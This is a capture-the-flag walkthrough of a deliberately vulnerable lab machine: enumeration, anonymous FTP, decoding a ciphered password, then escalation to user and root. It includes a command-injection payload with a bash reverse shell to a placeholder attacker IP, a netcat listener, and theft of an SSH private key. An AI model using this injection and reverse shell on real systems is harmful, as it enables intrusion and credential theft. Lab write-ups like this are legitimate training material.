Break Out The Cage
This is a free, easy room created by Magna. The room’s scene is helping Nicholas Cage regain his acting career by investigating the nefarious goings of his agent. The room looks at obtaining three key things:
- Weston’s (the agent) password.
- The user flag.
- The root flag.
Let’s get down to it!
Deploying the machine
For the purpose of this tutorial, I shall often be using the variable $ip_victim which simply refers to the ip of the room’s virtual machine.
Reconnaissance
Let’s try and identify if there are any open ports on the victim’s virtual machine:
> rustscan -a $ip_victim -- -sV -oN botc.nmap
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive server
s
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulim
it with '--ulimit 5000'.
Open 10.10.5.108:22
Open 10.10.5.108:21
Open 10.10.5.108:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-12 00:23 EST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 00:23
Scanning 10.10.5.108 [2 ports]
Completed Ping Scan at 00:23, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:23
Completed Parallel DNS resolution of 1 host. at 00:23, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 00:23
Scanning 10.10.5.108 [3 ports]
... # Omitted
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
From the scan, we notice that there are ftp, ssh and http services running on the server.
Let’s look at the http service
Using the ip address as the URL in a browser, it takes us to Nicholas Cage’s Diary. However, none of the links seem to work, and a review of the page’s source doesn’t reveal anything new.
Let’s do an enumeration of the website to see whether we can find any hidden directories and resources that could have value:
> gobuster dir -u 10.10.40.94 -w /usr/share/wordlists/dirb/big.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.94
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/12/12 05:03:17 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 276]
/.htpasswd (Status: 403) [Size: 276]
/contracts (Status: 301) [Size: 314] [--> http://10.10.40.94/contracts/]
/html (Status: 301) [Size: 309] [--> http://10.10.40.94/html/]
/images (Status: 301) [Size: 311] [--> http://10.10.40.94/images/]
/scripts (Status: 301) [Size: 312] [--> http://10.10.40.94/scripts/]
/server-status (Status: 403) [Size: 276]
===============================================================
2021/12/12 05:05:13 Finished
===============================================================
Navigating to each of these folders does not have anything interesting, with the scripts folder containing movie scripts.
And the ftp service?
Attempting an anonymous login dives us guest access to the ftp service. A directory listing reveals a file titled dad_tasks that we can download and open on our local machine. Reviewing the contents of this file shows an encoded string that doesn’t seem to be a hash when passed through hashid. However, passing it through a base64 decoder produces new cipher text that can be decoded using a Vigenère cipher. Given that we do not know the key, we can use a Vigenère solver, revealing Weston’s password.
> ftp 10.10.40.94
Connected to 10.10.40.94.
220 (vsFTPd 3.0.3)
Name (10.10.40.94:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 396 May 25 2020 dad_tasks
226 Directory send OK.
ftp> get dad_tasks
local: dad_tasks remote: dad_tasks
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dad_tasks (396 bytes).
226 Transfer complete.
396 bytes received in 0.00 secs (307.8971 kB/s)
ftp> exit
221 Goodbye.
# Let's review the contents of the file
> cat dad_tasks
UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds
# Passing the string through hashid doesn't reveal any known hash
> hashid $(cat dad_tasks)
Analyzing 'UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds'
[+] Unknown hash
# However, passing it through a base64 decoder reveals ciphered text that needs decoding
> cat dad_tasks | base64 -d
Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
# We can decipher this using a Vigenère cipher without knowing the key from https://www.guballa.de/vigenere-solver. This produces the following text
Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.
In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes
Can we try using the password on the ssh service?
With the ssh service left to be explored, we can attempt to create an ssh session weston using the password we discovered.
> ssh weston@$ip_victim
The authenticity of host '10.10.40.94 (10.10.40.94)' can't be established.
ED25519 key fingerprint is SHA256:o7pzAxWHDEV8n+uNpDnQ+sjkkBvKP3UVlNw2MpzspBw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.40.94' (ED25519) to the list of known hosts.
weston@10.10.40.94's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Dec 12 11:06:12 UTC 2021
System load: 0.0 Processes: 90
Usage of /: 20.3% of 19.56GB Users logged in: 0
Memory usage: 16% IP address for eth0: 10.10.40.94
Swap usage: 0%
39 packages can be updated.
0 updates are security updates.
__________
/\____;;___\
| / /
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | % )) |
% \|%________|
%%%%
Last login: Tue May 26 10:58:20 2020 from 192.168.247.1
weston@national-treasure:~$
Finding the user flag
I decided to see what commands I could execute at sudo. Turns out, there is one command and checking the permissions, I could see that group users can write to the file. Inspecting the file, a basic script was written to echo a single statement to the screen which doesn’t seem to be helpful.
> sudo -l
Matching Defaults entries for weston on national-treasure:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User weston may run the following commands on national-treasure:
(root) /usr/bin/bees
> ls -la /usr/bin/bees
-rwxr-xr-x 1 root root 56 May 25 2020 /usr/bin/bees # Script is group-writable
weston@national-treasure:/opt/.dads_scripts$ cat /usr/bin/bees
#!/bin/bash
wall "AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!"
Trying a different angle, I decided to look at the id’s for both weston and cage, we could see they belonged to the same cage groups. With this fact, I tried to find files that could be executed by both, hoping that I could find one that I could leverage to gain cage’s privileges.
Fortunately, I found a read-only python script that echoes quotes to user’s terminals using python’s os.system() function. This could serve as our entry point by modifying the .quotes file from which this script reads quotes from:
> id weston
uid=1001(weston) gid=1001(weston) groups=1001(weston),1000(cage)
> id cage
uid=1000(cage) gid=1000(cage) groups=1000(cage),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
# Discovering files owned by both cage and weston (same group)
> find / -group cage 2> /dev/null
/home/cage
/opt/.dads_scripts
/opt/.dads_scripts/spread_the_quotes.py
/opt/.dads_scripts/.files
/opt/.dads_scripts/.files/.quotes
> ls -la /opt/.dads_scripts/spread_the_quotes.py
-rwxr--r-- 1 cage cage 255 May 26 2020 /opt/.dads_scripts/spread_the_quotes.py
> cat /opt/.dads_scripts/spread_the_quotes.py
#!/usr/bin/env python
#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random
lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)
# Editing the .quotes file
# Note that there is an empty string and semi-colon before the bash reverse script given that
# the python script calls the "wall" command and therefore needs a string and terminator before
# it can call the reverse shell script on the same line / command.
> echo "'';bash -c 'exec bash -i &>/dev/tcp/<ATTACKER IP>/<ATTACKER LISTENING PORT> <&1'" > /opt/.dads_scripts/.files/.quotes
# On attacker's machine you configure the netcat listener
> nc -nlvp <ATTACKER LISTENING PORT>
# And after a few seconds / 1 minute, you will get the reverse shell as below:
> nc -nlvp <ATTACKER LISTENING PORT>
listening on [any] <ATTACKER LISTENING PORT> ...
connect to [<ATTACKER IP>] from (UNKNOWN) [<VICTIM IP] 58604
bash: cannot set terminal process group (1928): Inappropriate ioctl for device
bash: no job control in this shell
cage@national-treasure:~$
# For persistence, capture cage's private key so that we can ssh into the machine to get a fully functioning terminal.
> cat .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
<KEY CONTENTS>
-----END RSA PRIVATE KEY-----
# From the attacker machine, ssh into cage's account using the ssh key we obtained:
> ssh -i id_rsa cage@<VICTIM_IP>
cage@national-treasure:~$
In Cage’s home directory, there is a checklist file which, if opened reveals a checklist and the key for the user flag.
> cat Super_Duper_Checklist
1 - Increase acting lesson budget by at least 30%
2 - Get Weston to stop wearing eye-liner
3 - Get a new pet octopus
4 - Try and keep current wife
5 - Figure out why Weston has this etched into his desk: <REDACTED>
Cage’s home directory also has a folder that has some email backups. Reading each email, we notice a couple of things:
- email_1 : The word “Face” is repeated 3 times.
- email_2 : There is mention as to whether Sean’s account is the root account.
- email_3 : There is a cryptic message “haiinspsyanileph”, and face is repeated 6 times.
Using Vigenère cipher decoder with the key as “Face” reveals a potential password for the root account.
With this information, we can “su” to the root account and apply the password (if you have not ssh’ed into cage’s account using the ssh key we discovered earlier, you may need to do this first before escalating to root). Enumerating the root’s home directory lists an email_backup directory containing a couple of emails, one of which has the flag.
> su
# Enter in password
root@national-treasure:/home/cage#
> cd /root
> ls
email_backup
> cd email_backup/
> ls
email_1 email_2
> for i in $(ls .); do cat $i; done # Print all email contents to screen
From - SeanArcher@BigManAgents.com
To - master@ActorsGuild.com
Good Evening Master
<REDACTED>
From - master@ActorsGuild.com
To - SeanArcher@BigManAgents.com
Dear Sean
<REDACTED>
Thank you
Sean Archer
And that’s it! The room is solved!